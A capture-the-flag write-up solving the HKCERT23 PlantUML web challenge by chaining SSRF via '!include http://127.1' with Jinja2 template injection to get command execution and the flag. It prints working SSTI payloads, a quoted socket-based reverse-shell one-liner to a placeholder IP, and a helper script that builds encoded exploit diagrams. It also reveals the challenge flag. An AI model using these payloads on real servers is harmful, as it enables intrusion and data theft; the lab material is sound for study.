# ProbablyUnknown's Markup Language
> Tags: Web, ★★★☆☆
> Problem statement: We all know that CS majors must know a long list of markup languages like HTML, XML, etc...
How about IS majors? UML? Is UML even a markup language?
> [Test your UML knowledge!](http://chal.hkcert23.pwnable.hk:28104/)
> (Attachment included in the platform showing the source code)
From: HKCERT23
Solved by: chemistrying (aka DarkChemist)
## Notes before Writeup
Since I am not a Web expert, please let me know if there are any misconceptions so that the writeup can be refined (and I can learn more about Web stuff)~
## Brief Introduction About the Problem
You are given a UML editor that produces system diagrams, with a Flask server running behind it. You have to obtain the flag via `proof.sh`.
## Problem 1
`proof.sh` is in the `web` directory. However, we only interact with the PlantUML server, not the Flask server, and we have no direct access to the Flask server. How do we get the content of the Flask server?
## Insight 1
PlantUML is an external program, so, following the lesson from last year's CTF challenge ([香港生產力促進局 / CVE 1999](https://github.com/blackb6a/hkcert-ctf-2022-challenges/tree/main/29-cve-1999)), the best way to find insights is to Google known PlantUML vulnerabilities.
After clicking several links, I found the following page (https://huntr.com/bounties/0d737527-86e1-41d1-9d37-b2de36bc063a/).

After more googling, I found a GitHub advisory (https://github.com/advisories/GHSA-ff3m-68vj-h86p) which contains a reference link (https://huntr.com/bounties/8ac3316f-431c-468d-87e4-3dafff2ecf51/).

This information hints that we can exploit the PlantUML server, or more precisely, perform Server-Side Request Forgery (SSRF) through it.
## Solution to Problem 1
Combining the information above, we can try including an arbitrary website to see what happens.
```uml=
@startuml
!include https://www.example.com
a -> b: %load_json()
@enduml
```

This gives us a rough idea of what the script does: `!include <website>` includes the source of a webpage, while `a -> b: %load_json()` just triggers an error, which makes PlantUML show more of the webpage source.
After this, the second page (linked from the GitHub advisory) claims that local addresses can be accessed the same way:

So let's try with `127.1`, a shorthand for `127.0.0.1`.
```uml=
@startuml
!include http://127.1
a -> b: %load_json()
@enduml
```

We now get to see the content of the Flask webpage.
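Why does `127.1` work? Classic IPv4 parsers such as `inet_aton` accept a shortened dotted form in which the last number fills the remaining low-order bytes, so `127.1` means `127.0.0.1`. The snippet below is a small illustration using Python's `socket.inet_aton`, which wraps the platform's parser. Whether a given HTTP client accepts the short form depends on its own address parser; in this challenge PlantUML evidently did. A strict parser such as Python's `ipaddress` module rejects it.

```python
import ipaddress
import socket

# inet_aton accepts the legacy "a.b" form: "127.1" -> bytes 127, 0, 0, 1.
packed = socket.inet_aton("127.1")
print(socket.inet_ntoa(packed))  # 127.0.0.1

# The stricter ipaddress module insists on four octets and raises ValueError.
try:
    ipaddress.ip_address("127.1")
except ValueError as exc:
    print("ipaddress rejects it:", exc)
```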
## Problem 2
The source of the Flask server is given:
```python3=
from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route("/")
def index():
    # The "puml" query parameter is pasted in with Python %-formatting
    # *before* Jinja renders the string ("%%" becomes a literal "%").
    return render_template_string("""{%% raw %%}
<!doctype html>
<html>
<head>
<title>PUML Demo</title>
... (Some metadata and CSS stuff that I will omit here...)
<body>
<div>
<h1>PUML Demo</h1>
<p><textarea>%(puml)s</textarea></p>
<p><a href="https://plantuml.com/">More information...</a></p>
</div>
</body>
</html>
{%% endraw %%}""" % {"puml": request.args.get("puml")})

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=80)
```
In short, the script takes a parameter named `puml` and inserts the received string into the page's textarea.
So if we query `http://127.1?puml=hkcert23`, we get something like this:

Notice the textarea: `hkcert23` appears on the screen.
So the problem is, what can we do with it?
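One detail matters a lot here: the order of operations. Python's `%` formatting runs first and pastes `puml` verbatim into the template source, and only then does Jinja render that source. The sketch below reproduces just the formatting step, using a trimmed-down copy of the template (only the `<textarea>` line; the omitted metadata is irrelevant). `TEMPLATE` and `template_source` are names made up for this illustration.

```python
# Trimmed-down copy of the challenge template (metadata/CSS omitted).
TEMPLATE = """{%% raw %%}
<p><textarea>%(puml)s</textarea></p>
{%% endraw %%}"""


def template_source(puml: str) -> str:
    """Mimic the Flask handler's %-formatting step, i.e. what Jinja receives."""
    return TEMPLATE % {"puml": puml}


print(template_source("hkcert23"))
# {% raw %}
# <p><textarea>hkcert23</textarea></p>
# {% endraw %}
```

Whatever we send becomes part of the template code itself, not just data shown by the template.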
## Insight 2
Having no idea, the best approach is still to Google the answer. I searched for `render_template_string vulnerabilities` and found this on https://sl1nki.page/blog/2021/01/24/ssti:

The second example is very similar to our code: both perform string substitution / formatting on the template before rendering it. So we try `{{7*7}}` (`{{ ... }}` marks expressions to print to the template output, according to the [documentation](https://jinja.palletsprojects.com/en/3.1.x/templates/#synopsis)) and see what happens.

Note: `%7b%7b%37%2a%37%7d%7d` is the same as `{{7*7}}`, URL-encoded for passing to the parameter. From now on, we will URL-encode everything we pass to the parameter to avoid errors. I wrote a script that encodes every character, but online encoding tools should also work. Here is the script:
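```py=
# Percent-encode every character (not just reserved ones),
# e.g. "{{7*7}}" -> "%7b%7b%37%2a%37%7d%7d"
string = input()
output = ""
for char in string:
    output += "%{:02x}".format(ord(char))  # assumes ASCII input
print(output)
```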
It failed. But at least we know that this problem is very likely related to Server-Side Template Injection (SSTI).
## Problem 3
The only difference is that our template string is wrapped in `{% raw %}` and `{% endraw %}` (written `{%% raw %%}` in the Python source, because `%` formatting turns `%%` into `%`). This Jinja statement renders everything inside it as raw text, which is why `{{7*7}}` put directly into the parameter is output as plain text and nothing happens. So how do we bypass it?
## Insight 3
Recall XSS attacks: we put `</tag><script>alert(1)</script><tag>` to close the current tag and run JavaScript. Can we do the same with Jinja templates?
## Solution to Problem 2 and 3
Let's try inserting `{% endraw %}` at the front and `{% raw %}` at the back and see what happens. Our payload becomes `{% endraw %}{{7*7}}{% raw %}` (i.e. `%7b%25%20%65%6e%64%72%61%77%20%25%7d%7b%7b%37%2a%37%7d%7d%7b%25%20%72%61%77%20%25%7d`).

We got `49`, which is equal to `7*7`! This means the server is evaluating our expression!
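To see why the payload works, note that a raw block ends at the first `{% endraw %}` Jinja finds, no matter where it came from. The sketch below approximates this by deleting every `{% raw %} ... {% endraw %}` span with a regular expression and showing what is left for Jinja to evaluate. It is a simplified model, not Jinja's actual lexer (real Jinja also accepts whitespace-control variants such as `{%- endraw %}`), and it uses a trimmed-down copy of the challenge's `<textarea>` line. `TEMPLATE`, `RAW_BLOCK` and `outside_raw` are hypothetical names.

```python
import re

# Trimmed-down copy of the challenge template; "%%" is "%" after formatting.
TEMPLATE = """{%% raw %%}
<p><textarea>%(puml)s</textarea></p>
{%% endraw %%}"""

# Simplified model: each raw block runs from "{% raw %}" to the FIRST
# following "{% endraw %}" (non-greedy match, "." also matches newlines).
RAW_BLOCK = re.compile(r"\{% raw %\}.*?\{% endraw %\}", re.DOTALL)


def outside_raw(puml: str) -> str:
    """Return the part of the formatted template that Jinja would evaluate."""
    source = TEMPLATE % {"puml": puml}
    return RAW_BLOCK.sub("", source)


print(repr(outside_raw("{{7*7}}")))                       # ''
print(repr(outside_raw("{% endraw %}{{7*7}}{% raw %}")))  # '{{7*7}}'
```

With the plain payload everything stays inside one raw block; with the wrapped payload, `{{7*7}}` ends up between two raw blocks, exactly like closing and reopening an HTML tag in XSS.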
## Problem 4
We can finally evaluate expressions. So how do we get access to `proof.sh`?
## Insight 4
The page we found earlier claims that Remote Code Execution (RCE) is possible through SSTI:

Since I am not familiar with Python Remote Code Execution, we will once again ~~ab~~utilize google.
I searched for `python remote code execution jinja2` and came across this page (https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti).
After digesting the whole article, I found the most important part of the tutorial:

```python3=
# The class 396 is the class <class 'subprocess.Popen'>
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
# Calling os.popen without guessing the index of the class
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("ls").read()}}{%endif%}{% endfor %}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
## Passing the cmd line in a GET param
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
```
(The expressions provided by the website)
So now all we need to do is try these expressions.
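Both styles start from a harmless literal (`''` or `()`), climb to `object`, and then walk down `object.__subclasses__()` to find something useful. The plain-Python sketch below mirrors those steps outside Jinja. It also shows why a hardcoded index such as `396` is fragile: a class's position in that list depends on which modules have been imported and in what order, so searching by name is safer. The `catch_warnings` step relies on a CPython implementation detail (the instance keeps the `warnings` module in its `_module` attribute), which is what the second expression exploits; treat it as version-dependent. The sketch matches the exact name `catch_warnings` for determinism, whereas the Jinja payload uses the looser test `"warning" in x.__name__`.

```python
import os
import subprocess  # makes subprocess.Popen appear among object's subclasses
import warnings    # makes warnings.catch_warnings appear as well

# Step 1: both expressions climb from a literal to `object`.
assert ''.__class__.mro()[1] is object   # str's MRO is [str, object]
assert ().__class__.__base__ is object   # tuple's base class is object

subclasses = object.__subclasses__()

# Step 2 (first expression): look Popen up by name instead of trusting 396.
popen_index = next(
    i for i, cls in enumerate(subclasses) if cls.__name__ == "Popen"
)
print("Popen index in this interpreter:", popen_index)

# Step 3 (second expression): catch_warnings() stores the warnings module in
# `_module`; that module's __builtins__ dict exposes __import__.
gadget = next(cls for cls in subclasses if cls.__name__ == "catch_warnings")
os_module = gadget()._module.__builtins__["__import__"]("os")
print("reached the os module:", os_module is os)
```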
## Solution to Problem 4
Let's try the first one, since it is shorter. The payload is now `{% endraw %}{{''.__class__.mro()[1].__subclasses__()[396]('ls',shell=True,stdout=-1).communicate()[0].strip()}}{% raw %}`.

It failed[^1]. So let's try the next one. The payload is now `{% endraw %}{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("ls").read()}}{%endif%}{% endfor %}{% raw %}`[^2]

We got the directory listing, with `proof.sh` included! Let's change the command from `ls` to `./proof.sh`[^3] and see what happens:

Emm... The flag is cut in half. Maybe we should output the whole file to see what's inside? Let's change the command from `./proof.sh` to `cat proof.sh`. The encoded payload is now
`%7b%25%20%65%6e%64%72%61%77%20%25%7d%7b%25%20%66%6f%72%20%78%20%69%6e%20%28%29%2e%5f%5f%63%6c%61%73%73%5f%5f%2e%5f%5f%62%61%73%65%5f%5f%2e%5f%5f%73%75%62%63%6c%61%73%73%65%73%5f%5f%28%29%20%25%7d%7b%25%20%69%66%20%22%77%61%72%6e%69%6e%67%22%20%69%6e%20%78%2e%5f%5f%6e%61%6d%65%5f%5f%20%25%7d%7b%7b%78%28%29%2e%5f%6d%6f%64%75%6c%65%2e%5f%5f%62%75%69%6c%74%69%6e%73%5f%5f%5b%27%5f%5f%69%6d%70%6f%72%74%5f%5f%27%5d%28%27%6f%73%27%29%2e%70%6f%70%65%6e%28%22%63%61%74%20%70%72%6f%6f%66%2e%73%68%22%29%2e%72%65%61%64%28%29%7d%7d%7b%25%65%6e%64%69%66%25%7d%7b%25%20%65%6e%64%66%6f%72%20%25%7d%7b%25%20%72%61%77%20%25%7d`.
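Re-encoding the whole payload by hand every time the command changes gets tedious. A small helper can generate it from the command, under two assumptions: the Jinja payload is exactly the second hacktricks expression used above, and the diagram wraps it the same way as the earlier `!include http://127.1` diagram, via the `puml` query parameter. `ssti_payload`, `encode_all` and `build_puml` are hypothetical helper names. The command must not contain a double quote, since it is spliced into a `"..."` string inside the payload.

```python
from urllib.parse import unquote


def ssti_payload(cmd: str) -> str:
    """Close the raw block, run `cmd` via os.popen, then reopen the raw block."""
    # `cmd` lands inside a double-quoted Jinja string, so it must not contain '"'.
    return (
        "{% endraw %}"
        "{% for x in ().__class__.__base__.__subclasses__() %}"
        '{% if "warning" in x.__name__ %}'
        "{{x()._module.__builtins__['__import__']('os').popen(\"" + cmd + "\").read()}}"
        "{%endif%}{% endfor %}"
        "{% raw %}"
    )


def encode_all(text: str) -> str:
    """Percent-encode every UTF-8 byte (same output as the script above for ASCII)."""
    return "".join("%{:02x}".format(byte) for byte in text.encode("utf-8"))


def build_puml(cmd: str) -> str:
    """Wrap the encoded payload in a diagram that includes the Flask page."""
    encoded = encode_all(ssti_payload(cmd))
    assert unquote(encoded) == ssti_payload(cmd)  # sanity check: round-trips
    return (
        "@startuml\n"
        "!include http://127.1?puml=" + encoded + "\n"
        "a -> b: %load_json()\n"
        "@enduml"
    )


print(build_puml("cat proof.sh"))
```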

> Hmmm... the author teased me like that... I reckon it's the flag's problem...
Using the webpage's output-as-ASCII feature, we can copy the flag `hkcert23{System_Analysis_&amp;_Design_IS_SAD_0r_SAND?}`.
## Problem 5
I submitted the flag immediately, but it was rejected. Why? The challenge should have been finished: the target is clearly `proof.sh`, since that is what appears in the provided source folder (where `proof.sh` contains `hkcert23{fakeflag}`). What's wrong?
## Insight 5
Since I thought this was unintended, I opened a ticket in the official Discord server:

At this point, I realised that when I was testing[^4], `<` characters had been transformed into their HTML-escaped form `&lt;`. Since `&amp;` is suspicious and doesn't look like a normal word, let's use Google once again to see what it is.
## Solution to Problem 5
After googling, I found this result:

So by replacing `&amp;` with `&`, we got the flag `hkcert23{System_Analysis_&_Design_IS_SAD_0r_SAND?}`.
Success!
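The escaping most likely comes from autoescaping: for templates rendered with `render_template_string`, Flask enables Jinja's autoescape, so the output of every `{{ ... }}` expression has characters such as `&`, `<` and `>` replaced by HTML entities. Reversing it is a one-liner with Python's standard `html` module. The inputs below are the escaped forms of the flag and of the class name from footnote 4.

```python
import html

# Strings as they appeared in the rendered page (HTML-escaped by Jinja).
escaped_flag = "hkcert23{System_Analysis_&amp;_Design_IS_SAD_0r_SAND?}"
escaped_class = "&lt;class 'werkzeug.routing.matcher.StateMachineMatcher'&gt;"

print(html.unescape(escaped_flag))   # hkcert23{System_Analysis_&_Design_IS_SAD_0r_SAND?}
print(html.unescape(escaped_class))  # <class 'werkzeug.routing.matcher.StateMachineMatcher'>
```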
## Takeaways
1. Google is always helpful when solving CTF challenges.
2. When an external program is used, it is a great idea to check its vulnerabilities. This might give some insights.
3. Remember that HTML escape characters exist, or you will be embarrassed like me: knowing the full solution but getting stuck on silly stuff. If the challenge author hadn't given hints, I might not have solved this challenge even though I had 90%+ of the flag.
[^1]: I tested afterwards with the payload `{% endraw %}{{''.__class__.mro()[1].__subclasses__()[396]}}{% raw %}`. It turns out that index 396 is not `<class 'subprocess.Popen'>` as the article says, but `<class 'werkzeug.routing.matcher.StateMachineMatcher'>`. Later I discovered that the second expression doesn't need a hardcoded index, which is why I used it instead.
[^2]: Encoded payload is now `%7b%25%20%65%6e%64%72%61%77%20%25%7d%7b%25%20%66%6f%72%20%78%20%69%6e%20%28%29%2e%5f%5f%63%6c%61%73%73%5f%5f%2e%5f%5f%62%61%73%65%5f%5f%2e%5f%5f%73%75%62%63%6c%61%73%73%65%73%5f%5f%28%29%20%25%7d%7b%25%20%69%66%20%22%77%61%72%6e%69%6e%67%22%20%69%6e%20%78%2e%5f%5f%6e%61%6d%65%5f%5f%20%25%7d%7b%7b%78%28%29%2e%5f%6d%6f%64%75%6c%65%2e%5f%5f%62%75%69%6c%74%69%6e%73%5f%5f%5b%27%5f%5f%69%6d%70%6f%72%74%5f%5f%27%5d%28%27%6f%73%27%29%2e%70%6f%70%65%6e%28%22%6c%73%22%29%2e%72%65%61%64%28%29%7d%7d%7b%25%65%6e%64%69%66%25%7d%7b%25%20%65%6e%64%66%6f%72%20%25%7d%7b%25%20%72%61%77%20%25%7d`.
[^3]: Encoded payload is now `%7b%25%20%65%6e%64%72%61%77%20%25%7d%7b%25%20%66%6f%72%20%78%20%69%6e%20%28%29%2e%5f%5f%63%6c%61%73%73%5f%5f%2e%5f%5f%62%61%73%65%5f%5f%2e%5f%5f%73%75%62%63%6c%61%73%73%65%73%5f%5f%28%29%20%25%7d%7b%25%20%69%66%20%22%77%61%72%6e%69%6e%67%22%20%69%6e%20%78%2e%5f%5f%6e%61%6d%65%5f%5f%20%25%7d%7b%7b%78%28%29%2e%5f%6d%6f%64%75%6c%65%2e%5f%5f%62%75%69%6c%74%69%6e%73%5f%5f%5b%27%5f%5f%69%6d%70%6f%72%74%5f%5f%27%5d%28%27%6f%73%27%29%2e%70%6f%70%65%6e%28%22%2e%2f%70%72%6f%6f%66%2e%73%68%22%29%2e%72%65%61%64%28%29%7d%7d%7b%25%65%6e%64%69%66%25%7d%7b%25%20%65%6e%64%66%6f%72%20%25%7d%7b%25%20%72%61%77%20%25%7d`.
[^4]: While I was testing the payload mentioned in footnote 1, the result string was actually `&lt;class 'werkzeug.routing.matcher.StateMachineMatcher'&gt;`. `&lt;` and `&gt;` are the HTML-escaped forms of the `<` and `>` characters respectively.